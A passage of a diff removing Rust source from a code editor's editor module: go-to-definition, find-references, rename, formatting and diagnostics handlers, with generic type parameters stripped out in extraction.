editor.find_all_references(&FindAllReferences, window, cx) - })? 
{ - Some(references) => references.await, - None => Ok(Navigated::No), - } - } - } - }) - } - - pub fn go_to_declaration( - &mut self, - _: &GoToDeclaration, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, false, window, cx) - } - - pub fn go_to_declaration_split( - &mut self, - _: &GoToDeclaration, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, true, window, cx) - } - - pub fn go_to_implementation( - &mut self, - _: &GoToImplementation, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, false, window, cx) - } - - pub fn go_to_implementation_split( - &mut self, - _: &GoToImplementationSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, true, window, cx) - } - - pub fn go_to_type_definition( - &mut self, - _: &GoToTypeDefinition, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Type, false, window, cx) - } - - pub fn go_to_definition_split( - &mut self, - _: &GoToDefinitionSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, true, window, cx) - } - - pub fn go_to_type_definition_split( - &mut self, - _: &GoToTypeDefinitionSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Type, true, window, cx) - } - - fn go_to_definition_of_kind( - &mut self, - kind: GotoDefinitionKind, - split: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let Some(provider) = self.semantics_provider.clone() else { - return Task::ready(Ok(Navigated::No)); - }; - let head = self.selections.newest::(cx).head(); - let buffer = self.buffer.read(cx); - let (buffer, head) = if let 
Some(text_anchor) = buffer.text_anchor_for_position(head, cx) { - text_anchor - } else { - return Task::ready(Ok(Navigated::No)); - }; - - let Some(definitions) = provider.definitions(&buffer, head, kind, cx) else { - return Task::ready(Ok(Navigated::No)); - }; - - cx.spawn_in(window, async move |editor, cx| { - let definitions = definitions.await?; - let navigated = editor - .update_in(cx, |editor, window, cx| { - editor.navigate_to_hover_links( - Some(kind), - definitions - .into_iter() - .filter(|location| { - hover_links::exclude_link_to_position(&buffer, &head, location, cx) - }) - .map(HoverLink::Text) - .collect::>(), - split, - window, - cx, - ) - })? - .await?; - anyhow::Ok(navigated) - }) - } - - pub fn open_url(&mut self, _: &OpenUrl, window: &mut Window, cx: &mut Context) { - let selection = self.selections.newest_anchor(); - let head = selection.head(); - let tail = selection.tail(); - - let Some((buffer, start_position)) = - self.buffer.read(cx).text_anchor_for_position(head, cx) - else { - return; - }; - - let end_position = if head != tail { - let Some((_, pos)) = self.buffer.read(cx).text_anchor_for_position(tail, cx) else { - return; - }; - Some(pos) - } else { - None - }; - - let url_finder = cx.spawn_in(window, async move |editor, cx| { - let url = if let Some(end_pos) = end_position { - find_url_from_range(&buffer, start_position..end_pos, cx.clone()) - } else { - find_url(&buffer, start_position, cx.clone()).map(|(_, url)| url) - }; - - if let Some(url) = url { - editor.update(cx, |_, cx| { - cx.open_url(&url); - }) - } else { - Ok(()) - } - }); - - url_finder.detach(); - } - - pub fn open_selected_filename( - &mut self, - _: &OpenSelectedFilename, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - return; - }; - - let position = self.selections.newest_anchor().head(); - - let Some((buffer, buffer_position)) = - self.buffer.read(cx).text_anchor_for_position(position, cx) - else { - return; - }; - 
- let project = self.project.clone(); - - cx.spawn_in(window, async move |_, cx| { - let result = find_file(&buffer, project, buffer_position, cx).await; - - if let Some((_, path)) = result { - workspace - .update_in(cx, |workspace, window, cx| { - workspace.open_resolved_path(path, window, cx) - })? - .await?; - } - anyhow::Ok(()) - }) - .detach(); - } - - pub(crate) fn navigate_to_hover_links( - &mut self, - kind: Option, - mut definitions: Vec, - split: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - // If there is one definition, just open it directly - if definitions.len() == 1 { - let definition = definitions.pop().unwrap(); - - enum TargetTaskResult { - Location(Option), - AlreadyNavigated, - } - - let target_task = match definition { - HoverLink::Text(link) => { - Task::ready(anyhow::Ok(TargetTaskResult::Location(Some(link.target)))) - } - HoverLink::InlayHint(lsp_location, server_id) => { - let computation = - self.compute_target_location(lsp_location, server_id, window, cx); - cx.background_spawn(async move { - let location = computation.await?; - Ok(TargetTaskResult::Location(location)) - }) - } - HoverLink::Url(url) => { - cx.open_url(&url); - Task::ready(Ok(TargetTaskResult::AlreadyNavigated)) - } - HoverLink::File(path) => { - if let Some(workspace) = self.workspace() { - cx.spawn_in(window, async move |_, cx| { - workspace - .update_in(cx, |workspace, window, cx| { - workspace.open_resolved_path(path, window, cx) - })? - .await - .map(|_| TargetTaskResult::AlreadyNavigated) - }) - } else { - Task::ready(Ok(TargetTaskResult::Location(None))) - } - } - }; - cx.spawn_in(window, async move |editor, cx| { - let target = match target_task.await.context("target resolution task")? 
{ - TargetTaskResult::AlreadyNavigated => return Ok(Navigated::Yes), - TargetTaskResult::Location(None) => return Ok(Navigated::No), - TargetTaskResult::Location(Some(target)) => target, - }; - - editor.update_in(cx, |editor, window, cx| { - let Some(workspace) = editor.workspace() else { - return Navigated::No; - }; - let pane = workspace.read(cx).active_pane().clone(); - - let range = target.range.to_point(target.buffer.read(cx)); - let range = editor.range_for_match(&range); - let range = collapse_multiline_range(range); - - if !split - && Some(&target.buffer) == editor.buffer.read(cx).as_singleton().as_ref() - { - editor.go_to_singleton_buffer_range(range.clone(), window, cx); - } else { - window.defer(cx, move |window, cx| { - let target_editor: Entity = - workspace.update(cx, |workspace, cx| { - let pane = if split { - workspace.adjacent_pane(window, cx) - } else { - workspace.active_pane().clone() - }; - - workspace.open_project_item( - pane, - target.buffer.clone(), - true, - true, - window, - cx, - ) - }); - target_editor.update(cx, |target_editor, cx| { - // When selecting a definition in a different buffer, disable the nav history - // to avoid creating a history entry at the previous cursor location. 
- pane.update(cx, |pane, _| pane.disable_history()); - target_editor.go_to_singleton_buffer_range(range, window, cx); - pane.update(cx, |pane, _| pane.enable_history()); - }); - }); - } - Navigated::Yes - }) - }) - } else if !definitions.is_empty() { - cx.spawn_in(window, async move |editor, cx| { - let (title, location_tasks, workspace) = editor - .update_in(cx, |editor, window, cx| { - let tab_kind = match kind { - Some(GotoDefinitionKind::Implementation) => "Implementations", - _ => "Definitions", - }; - let title = definitions - .iter() - .find_map(|definition| match definition { - HoverLink::Text(link) => link.origin.as_ref().map(|origin| { - let buffer = origin.buffer.read(cx); - format!( - "{} for {}", - tab_kind, - buffer - .text_for_range(origin.range.clone()) - .collect::() - ) - }), - HoverLink::InlayHint(_, _) => None, - HoverLink::Url(_) => None, - HoverLink::File(_) => None, - }) - .unwrap_or(tab_kind.to_string()); - let location_tasks = definitions - .into_iter() - .map(|definition| match definition { - HoverLink::Text(link) => Task::ready(Ok(Some(link.target))), - HoverLink::InlayHint(lsp_location, server_id) => editor - .compute_target_location(lsp_location, server_id, window, cx), - HoverLink::Url(_) => Task::ready(Ok(None)), - HoverLink::File(_) => Task::ready(Ok(None)), - }) - .collect::>(); - (title, location_tasks, editor.workspace().clone()) - }) - .context("location tasks preparation")?; - - let locations = future::join_all(location_tasks) - .await - .into_iter() - .filter_map(|location| location.transpose()) - .collect::>() - .context("location tasks")?; - - let Some(workspace) = workspace else { - return Ok(Navigated::No); - }; - let opened = workspace - .update_in(cx, |workspace, window, cx| { - Self::open_locations_in_multibuffer( - workspace, - locations, - title, - split, - MultibufferSelectionMode::First, - window, - cx, - ) - }) - .ok(); - - anyhow::Ok(Navigated::from_bool(opened.is_some())) - }) - } else { - 
Task::ready(Ok(Navigated::No)) - } - } - - fn compute_target_location( - &self, - lsp_location: lsp::Location, - server_id: LanguageServerId, - window: &mut Window, - cx: &mut Context, - ) -> Task>> { - let Some(project) = self.project.clone() else { - return Task::ready(Ok(None)); - }; - - cx.spawn_in(window, async move |editor, cx| { - let location_task = editor.update(cx, |_, cx| { - project.update(cx, |project, cx| { - let language_server_name = project - .language_server_statuses(cx) - .find(|(id, _)| server_id == *id) - .map(|(_, status)| LanguageServerName::from(status.name.as_str())); - language_server_name.map(|language_server_name| { - project.open_local_buffer_via_lsp( - lsp_location.uri.clone(), - server_id, - language_server_name, - cx, - ) - }) - }) - })?; - let location = match location_task { - Some(task) => Some({ - let target_buffer_handle = task.await.context("open local buffer")?; - let range = target_buffer_handle.update(cx, |target_buffer, _| { - let target_start = target_buffer - .clip_point_utf16(point_from_lsp(lsp_location.range.start), Bias::Left); - let target_end = target_buffer - .clip_point_utf16(point_from_lsp(lsp_location.range.end), Bias::Left); - target_buffer.anchor_after(target_start) - ..target_buffer.anchor_before(target_end) - })?; - Location { - buffer: target_buffer_handle, - range, - } - }), - None => None, - }; - Ok(location) - }) - } - - pub fn find_all_references( - &mut self, - _: &FindAllReferences, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - let selection = self.selections.newest::(cx); - let multi_buffer = self.buffer.read(cx); - let head = selection.head(); - - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let head_anchor = multi_buffer_snapshot.anchor_at( - head, - if head < selection.tail() { - Bias::Right - } else { - Bias::Left - }, - ); - - match self - .find_all_references_task_sources - .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) - { - Ok(_) => { 
- log::info!( - "Ignoring repeated FindAllReferences invocation with the position of already running task" - ); - return None; - } - Err(i) => { - self.find_all_references_task_sources.insert(i, head_anchor); - } - } - - let (buffer, head) = multi_buffer.text_anchor_for_position(head, cx)?; - let workspace = self.workspace()?; - let project = workspace.read(cx).project().clone(); - let references = project.update(cx, |project, cx| project.references(&buffer, head, cx)); - Some(cx.spawn_in(window, async move |editor, cx| { - let _cleanup = cx.on_drop(&editor, move |editor, _| { - if let Ok(i) = editor - .find_all_references_task_sources - .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) - { - editor.find_all_references_task_sources.remove(i); - } - }); - - let locations = references.await?; - if locations.is_empty() { - return anyhow::Ok(Navigated::No); - } - - workspace.update_in(cx, |workspace, window, cx| { - let title = locations - .first() - .as_ref() - .map(|location| { - let buffer = location.buffer.read(cx); - format!( - "References to `{}`", - buffer - .text_for_range(location.range.clone()) - .collect::() - ) - }) - .unwrap(); - Self::open_locations_in_multibuffer( - workspace, - locations, - title, - false, - MultibufferSelectionMode::First, - window, - cx, - ); - Navigated::Yes - }) - })) - } - - /// Opens a multibuffer with the given project locations in it - pub fn open_locations_in_multibuffer( - workspace: &mut Workspace, - mut locations: Vec, - title: String, - split: bool, - multibuffer_selection_mode: MultibufferSelectionMode, - window: &mut Window, - cx: &mut Context, - ) { - // If there are multiple definitions, open them in a multibuffer - locations.sort_by_key(|location| location.buffer.read(cx).remote_id()); - let mut locations = locations.into_iter().peekable(); - let mut ranges: Vec> = Vec::new(); - let capability = workspace.project().read(cx).capability(); - - let excerpt_buffer = cx.new(|cx| { - let mut 
multibuffer = MultiBuffer::new(capability); - while let Some(location) = locations.next() { - let buffer = location.buffer.read(cx); - let mut ranges_for_buffer = Vec::new(); - let range = location.range.to_point(buffer); - ranges_for_buffer.push(range.clone()); - - while let Some(next_location) = locations.peek() { - if next_location.buffer == location.buffer { - ranges_for_buffer.push(next_location.range.to_point(buffer)); - locations.next(); - } else { - break; - } - } - - ranges_for_buffer.sort_by_key(|range| (range.start, Reverse(range.end))); - let (new_ranges, _) = multibuffer.set_excerpts_for_path( - PathKey::for_buffer(&location.buffer, cx), - location.buffer.clone(), - ranges_for_buffer, - DEFAULT_MULTIBUFFER_CONTEXT, - cx, - ); - ranges.extend(new_ranges) - } - - multibuffer.with_title(title) - }); - - let editor = cx.new(|cx| { - Editor::for_multibuffer( - excerpt_buffer, - Some(workspace.project().clone()), - window, - cx, - ) - }); - editor.update(cx, |editor, cx| { - match multibuffer_selection_mode { - MultibufferSelectionMode::First => { - if let Some(first_range) = ranges.first() { - editor.change_selections(None, window, cx, |selections| { - selections.clear_disjoint(); - selections.select_anchor_ranges(std::iter::once(first_range.clone())); - }); - } - editor.highlight_background::( - &ranges, - |theme| theme.editor_highlighted_line_background, - cx, - ); - } - MultibufferSelectionMode::All => { - editor.change_selections(None, window, cx, |selections| { - selections.clear_disjoint(); - selections.select_anchor_ranges(ranges); - }); - } - } - editor.register_buffers_with_language_servers(cx); - }); - - let item = Box::new(editor); - let item_id = item.item_id(); - - if split { - workspace.split_item(SplitDirection::Right, item.clone(), window, cx); - } else { - if PreviewTabsSettings::get_global(cx).enable_preview_from_code_navigation { - let (preview_item_id, preview_item_idx) = - workspace.active_pane().update(cx, |pane, _| { - 
(pane.preview_item_id(), pane.preview_item_idx()) - }); - - workspace.add_item_to_active_pane(item.clone(), preview_item_idx, true, window, cx); - - if let Some(preview_item_id) = preview_item_id { - workspace.active_pane().update(cx, |pane, cx| { - pane.remove_item(preview_item_id, false, false, window, cx); - }); - } - } else { - workspace.add_item_to_active_pane(item.clone(), None, true, window, cx); - } - } - workspace.active_pane().update(cx, |pane, cx| { - pane.set_preview_item_id(Some(item_id), cx); - }); - } - - pub fn rename( - &mut self, - _: &Rename, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - use language::ToOffset as _; - - let provider = self.semantics_provider.clone()?; - let selection = self.selections.newest_anchor().clone(); - let (cursor_buffer, cursor_buffer_position) = self - .buffer - .read(cx) - .text_anchor_for_position(selection.head(), cx)?; - let (tail_buffer, cursor_buffer_position_end) = self - .buffer - .read(cx) - .text_anchor_for_position(selection.tail(), cx)?; - if tail_buffer != cursor_buffer { - return None; - } - - let snapshot = cursor_buffer.read(cx).snapshot(); - let cursor_buffer_offset = cursor_buffer_position.to_offset(&snapshot); - let cursor_buffer_offset_end = cursor_buffer_position_end.to_offset(&snapshot); - let prepare_rename = provider - .range_for_rename(&cursor_buffer, cursor_buffer_position, cx) - .unwrap_or_else(|| Task::ready(Ok(None))); - drop(snapshot); - - Some(cx.spawn_in(window, async move |this, cx| { - let rename_range = if let Some(range) = prepare_rename.await? 
{ - Some(range) - } else { - this.update(cx, |this, cx| { - let buffer = this.buffer.read(cx).snapshot(cx); - let mut buffer_highlights = this - .document_highlights_for_position(selection.head(), &buffer) - .filter(|highlight| { - highlight.start.excerpt_id == selection.head().excerpt_id - && highlight.end.excerpt_id == selection.head().excerpt_id - }); - buffer_highlights - .next() - .map(|highlight| highlight.start.text_anchor..highlight.end.text_anchor) - })? - }; - if let Some(rename_range) = rename_range { - this.update_in(cx, |this, window, cx| { - let snapshot = cursor_buffer.read(cx).snapshot(); - let rename_buffer_range = rename_range.to_offset(&snapshot); - let cursor_offset_in_rename_range = - cursor_buffer_offset.saturating_sub(rename_buffer_range.start); - let cursor_offset_in_rename_range_end = - cursor_buffer_offset_end.saturating_sub(rename_buffer_range.start); - - this.take_rename(false, window, cx); - let buffer = this.buffer.read(cx).read(cx); - let cursor_offset = selection.head().to_offset(&buffer); - let rename_start = cursor_offset.saturating_sub(cursor_offset_in_rename_range); - let rename_end = rename_start + rename_buffer_range.len(); - let range = buffer.anchor_before(rename_start)..buffer.anchor_after(rename_end); - let mut old_highlight_id = None; - let old_name: Arc = buffer - .chunks(rename_start..rename_end, true) - .map(|chunk| { - if old_highlight_id.is_none() { - old_highlight_id = chunk.syntax_highlight_id; - } - chunk.text - }) - .collect::() - .into(); - - drop(buffer); - - // Position the selection in the rename editor so that it matches the current selection. 
- this.show_local_selections = false; - let rename_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); - editor.buffer.update(cx, |buffer, cx| { - buffer.edit([(0..0, old_name.clone())], None, cx) - }); - let rename_selection_range = match cursor_offset_in_rename_range - .cmp(&cursor_offset_in_rename_range_end) - { - Ordering::Equal => { - editor.select_all(&SelectAll, window, cx); - return editor; - } - Ordering::Less => { - cursor_offset_in_rename_range..cursor_offset_in_rename_range_end - } - Ordering::Greater => { - cursor_offset_in_rename_range_end..cursor_offset_in_rename_range - } - }; - if rename_selection_range.end > old_name.len() { - editor.select_all(&SelectAll, window, cx); - } else { - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([rename_selection_range]); - }); - } - editor - }); - cx.subscribe(&rename_editor, |_, _, e: &EditorEvent, cx| { - if e == &EditorEvent::Focused { - cx.emit(EditorEvent::FocusedIn) - } - }) - .detach(); - - let write_highlights = - this.clear_background_highlights::(cx); - let read_highlights = - this.clear_background_highlights::(cx); - let ranges = write_highlights - .iter() - .flat_map(|(_, ranges)| ranges.iter()) - .chain(read_highlights.iter().flat_map(|(_, ranges)| ranges.iter())) - .cloned() - .collect(); - - this.highlight_text::( - ranges, - HighlightStyle { - fade_out: Some(0.6), - ..Default::default() - }, - cx, - ); - let rename_focus_handle = rename_editor.focus_handle(cx); - window.focus(&rename_focus_handle); - let block_id = this.insert_blocks( - [BlockProperties { - style: BlockStyle::Flex, - placement: BlockPlacement::Below(range.start), - height: Some(1), - render: Arc::new({ - let rename_editor = rename_editor.clone(); - move |cx: &mut BlockContext| { - let mut text_style = cx.editor_style.text.clone(); - if let Some(highlight_style) = old_highlight_id - .and_then(|h| h.style(&cx.editor_style.syntax)) - { - text_style = 
text_style.highlight(highlight_style); - } - div() - .block_mouse_down() - .pl(cx.anchor_x) - .child(EditorElement::new( - &rename_editor, - EditorStyle { - background: cx.theme().system().transparent, - local_player: cx.editor_style.local_player, - text: text_style, - scrollbar_width: cx.editor_style.scrollbar_width, - syntax: cx.editor_style.syntax.clone(), - status: cx.editor_style.status.clone(), - inlay_hints_style: HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..make_inlay_hints_style(cx.app) - }, - inline_completion_styles: make_suggestion_styles( - cx.app, - ), - ..EditorStyle::default() - }, - )) - .into_any_element() - } - }), - priority: 0, - }], - Some(Autoscroll::fit()), - cx, - )[0]; - this.pending_rename = Some(RenameState { - range, - old_name, - editor: rename_editor, - block_id, - }); - })?; - } - - Ok(()) - })) - } - - pub fn confirm_rename( - &mut self, - _: &ConfirmRename, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - let rename = self.take_rename(false, window, cx)?; - let workspace = self.workspace()?.downgrade(); - let (buffer, start) = self - .buffer - .read(cx) - .text_anchor_for_position(rename.range.start, cx)?; - let (end_buffer, _) = self - .buffer - .read(cx) - .text_anchor_for_position(rename.range.end, cx)?; - if buffer != end_buffer { - return None; - } - - let old_name = rename.old_name; - let new_name = rename.editor.read(cx).text(cx); - - let rename = self.semantics_provider.as_ref()?.perform_rename( - &buffer, - start, - new_name.clone(), - cx, - )?; - - Some(cx.spawn_in(window, async move |editor, cx| { - let project_transaction = rename.await?; - Self::open_project_transaction( - &editor, - workspace, - project_transaction, - format!("Rename: {} → {}", old_name, new_name), - cx, - ) - .await?; - - editor.update(cx, |editor, cx| { - editor.refresh_document_highlights(cx); - })?; - Ok(()) - })) - } - - fn take_rename( - &mut self, - moving_cursor: bool, - window: &mut Window, - cx: &mut Context, - ) 
-> Option { - let rename = self.pending_rename.take()?; - if rename.editor.focus_handle(cx).is_focused(window) { - window.focus(&self.focus_handle); - } - - self.remove_blocks( - [rename.block_id].into_iter().collect(), - Some(Autoscroll::fit()), - cx, - ); - self.clear_highlights::(cx); - self.show_local_selections = true; - - if moving_cursor { - let cursor_in_rename_editor = rename.editor.update(cx, |editor, cx| { - editor.selections.newest::(cx).head() - }); - - // Update the selection to match the position of the selection inside - // the rename editor. - let snapshot = self.buffer.read(cx).read(cx); - let rename_range = rename.range.to_offset(&snapshot); - let cursor_in_editor = snapshot - .clip_offset(rename_range.start + cursor_in_rename_editor, Bias::Left) - .min(rename_range.end); - drop(snapshot); - - self.change_selections(None, window, cx, |s| { - s.select_ranges(vec![cursor_in_editor..cursor_in_editor]) - }); - } else { - self.refresh_document_highlights(cx); - } - - Some(rename) - } - - pub fn pending_rename(&self) -> Option<&RenameState> { - self.pending_rename.as_ref() - } - - fn format( - &mut self, - _: &Format, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - - Some(self.perform_format( - project, - FormatTrigger::Manual, - FormatTarget::Buffers, - window, - cx, - )) - } - - fn format_selections( - &mut self, - _: &FormatSelections, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - - let ranges = self - .selections - .all_adjusted(cx) - .into_iter() - .map(|selection| selection.range()) - .collect_vec(); - - Some(self.perform_format( - project, - FormatTrigger::Manual, - 
FormatTarget::Ranges(ranges), - window, - cx, - )) - } - - fn perform_format( - &mut self, - project: Entity, - trigger: FormatTrigger, - target: FormatTarget, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let buffer = self.buffer.clone(); - let (buffers, target) = match target { - FormatTarget::Buffers => { - let mut buffers = buffer.read(cx).all_buffers(); - if trigger == FormatTrigger::Save { - buffers.retain(|buffer| buffer.read(cx).is_dirty()); - } - (buffers, LspFormatTarget::Buffers) - } - FormatTarget::Ranges(selection_ranges) => { - let multi_buffer = buffer.read(cx); - let snapshot = multi_buffer.read(cx); - let mut buffers = HashSet::default(); - let mut buffer_id_to_ranges: BTreeMap>> = - BTreeMap::new(); - for selection_range in selection_ranges { - for (buffer, buffer_range, _) in - snapshot.range_to_buffer_ranges(selection_range) - { - let buffer_id = buffer.remote_id(); - let start = buffer.anchor_before(buffer_range.start); - let end = buffer.anchor_after(buffer_range.end); - buffers.insert(multi_buffer.buffer(buffer_id).unwrap()); - buffer_id_to_ranges - .entry(buffer_id) - .and_modify(|buffer_ranges| buffer_ranges.push(start..end)) - .or_insert_with(|| vec![start..end]); - } - } - (buffers, LspFormatTarget::Ranges(buffer_id_to_ranges)) - } - }; - - let transaction_id_prev = buffer.read_with(cx, |b, cx| b.last_transaction_id(cx)); - let selections_prev = transaction_id_prev - .and_then(|transaction_id_prev| { - // default to selections as they were after the last edit, if we have them, - // instead of how they are now. - // This will make it so that editing, moving somewhere else, formatting, then undoing the format - // will take you back to where you made the last edit, instead of staying where you scrolled - self.selection_history - .transaction(transaction_id_prev) - .map(|t| t.0.clone()) - }) - .unwrap_or_else(|| { - log::info!("Failed to determine selections from before format. 
Falling back to selections when format was initiated"); - self.selections.disjoint_anchors() - }); - - let mut timeout = cx.background_executor().timer(FORMAT_TIMEOUT).fuse(); - let format = project.update(cx, |project, cx| { - project.format(buffers, target, true, trigger, cx) - }); - - cx.spawn_in(window, async move |editor, cx| { - let transaction = futures::select_biased! { - transaction = format.log_err().fuse() => transaction, - () = timeout => { - log::warn!("timed out waiting for formatting"); - None - } - }; - - buffer - .update(cx, |buffer, cx| { - if let Some(transaction) = transaction { - if !buffer.is_singleton() { - buffer.push_transaction(&transaction.0, cx); - } - } - cx.notify(); - }) - .ok(); - - if let Some(transaction_id_now) = - buffer.read_with(cx, |b, cx| b.last_transaction_id(cx))? - { - let has_new_transaction = transaction_id_prev != Some(transaction_id_now); - if has_new_transaction { - _ = editor.update(cx, |editor, _| { - editor - .selection_history - .insert_transaction(transaction_id_now, selections_prev); - }); - } - } - - Ok(()) - }) - } - - fn organize_imports( - &mut self, - _: &OrganizeImports, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - Some(self.perform_code_action_kind( - project, - CodeActionKind::SOURCE_ORGANIZE_IMPORTS, - window, - cx, - )) - } - - fn perform_code_action_kind( - &mut self, - project: Entity, - kind: CodeActionKind, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let buffer = self.buffer.clone(); - let buffers = buffer.read(cx).all_buffers(); - let mut timeout = cx.background_executor().timer(CODE_ACTION_TIMEOUT).fuse(); - let apply_action = project.update(cx, |project, cx| { - project.apply_code_action_kind(buffers, kind, true, cx) - }); - cx.spawn_in(window, async move |_, cx| { - let transaction = 
futures::select_biased! { - () = timeout => { - log::warn!("timed out waiting for executing code action"); - None - } - transaction = apply_action.log_err().fuse() => transaction, - }; - buffer - .update(cx, |buffer, cx| { - // check if we need this - if let Some(transaction) = transaction { - if !buffer.is_singleton() { - buffer.push_transaction(&transaction.0, cx); - } - } - cx.notify(); - }) - .ok(); - Ok(()) - }) - } - - fn restart_language_server( - &mut self, - _: &RestartLanguageServer, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.clone() { - self.buffer.update(cx, |multi_buffer, cx| { - project.update(cx, |project, cx| { - project.restart_language_servers_for_buffers( - multi_buffer.all_buffers().into_iter().collect(), - cx, - ); - }); - }) - } - } - - fn stop_language_server( - &mut self, - _: &StopLanguageServer, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.clone() { - self.buffer.update(cx, |multi_buffer, cx| { - project.update(cx, |project, cx| { - project.stop_language_servers_for_buffers( - multi_buffer.all_buffers().into_iter().collect(), - cx, - ); - cx.emit(project::Event::RefreshInlayHints); - }); - }); - } - } - - fn cancel_language_server_work( - workspace: &mut Workspace, - _: &actions::CancelLanguageServerWork, - _: &mut Window, - cx: &mut Context, - ) { - let project = workspace.project(); - let buffers = workspace - .active_item(cx) - .and_then(|item| item.act_as::(cx)) - .map_or(HashSet::default(), |editor| { - editor.read(cx).buffer.read(cx).all_buffers() - }); - project.update(cx, |project, cx| { - project.cancel_language_server_work_for_buffers(buffers, cx); - }); - } - - fn show_character_palette( - &mut self, - _: &ShowCharacterPalette, - window: &mut Window, - _: &mut Context, - ) { - window.show_character_palette(); - } - - fn refresh_active_diagnostics(&mut self, cx: &mut Context) { - if let ActiveDiagnostic::Group(active_diagnostics) = &mut 
self.active_diagnostics { - let buffer = self.buffer.read(cx).snapshot(cx); - let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); - let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); - let is_valid = buffer - .diagnostics_in_range::(primary_range_start..primary_range_end) - .any(|entry| { - entry.diagnostic.is_primary - && !entry.range.is_empty() - && entry.range.start == primary_range_start - && entry.diagnostic.message == active_diagnostics.active_message - }); - - if !is_valid { - self.dismiss_diagnostics(cx); - } - } - } - - pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { - match &self.active_diagnostics { - ActiveDiagnostic::Group(group) => Some(group), - _ => None, - } - } - - pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { - self.dismiss_diagnostics(cx); - self.active_diagnostics = ActiveDiagnostic::All; - } - - fn activate_diagnostics( - &mut self, - buffer_id: BufferId, - diagnostic: DiagnosticEntry, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - } - self.dismiss_diagnostics(cx); - let snapshot = self.snapshot(window, cx); - let buffer = self.buffer.read(cx).snapshot(cx); - let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { - return; - }; - - let diagnostic_group = buffer - .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) - .collect::>(); - - let blocks = - renderer.render_group(diagnostic_group, buffer_id, snapshot, cx.weak_entity(), cx); - - let blocks = self.display_map.update(cx, |display_map, cx| { - display_map.insert_blocks(blocks, cx).into_iter().collect() - }); - self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { - active_range: buffer.anchor_before(diagnostic.range.start) - ..buffer.anchor_after(diagnostic.range.end), - active_message: diagnostic.diagnostic.message.clone(), - group_id: diagnostic.diagnostic.group_id, - 
blocks, - }); - cx.notify(); - } - - fn dismiss_diagnostics(&mut self, cx: &mut Context) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - }; - - let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); - if let ActiveDiagnostic::Group(group) = prev { - self.display_map.update(cx, |display_map, cx| { - display_map.remove_blocks(group.blocks, cx); - }); - cx.notify(); - } - } - - /// Disable inline diagnostics rendering for this editor. - pub fn disable_inline_diagnostics(&mut self) { - self.inline_diagnostics_enabled = false; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - - pub fn inline_diagnostics_enabled(&self) -> bool { - self.inline_diagnostics_enabled - } - - pub fn show_inline_diagnostics(&self) -> bool { - self.show_inline_diagnostics - } - - pub fn toggle_inline_diagnostics( - &mut self, - _: &ToggleInlineDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_diagnostics = !self.show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - fn refresh_inline_diagnostics( - &mut self, - debounce: bool, - window: &mut Window, - cx: &mut Context, - ) { - if !self.inline_diagnostics_enabled || !self.show_inline_diagnostics { - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - return; - } - - let debounce_ms = ProjectSettings::get_global(cx) - .diagnostics - .inline - .update_debounce_ms; - let debounce = if debounce && debounce_ms > 0 { - Some(Duration::from_millis(debounce_ms)) - } else { - None - }; - self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { - let editor = editor.upgrade().unwrap(); - - if let Some(debounce) = debounce { - cx.background_executor().timer(debounce).await; - } - let Some(snapshot) = editor - .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - .ok() - else { - return; - }; - - let new_inline_diagnostics = cx - 
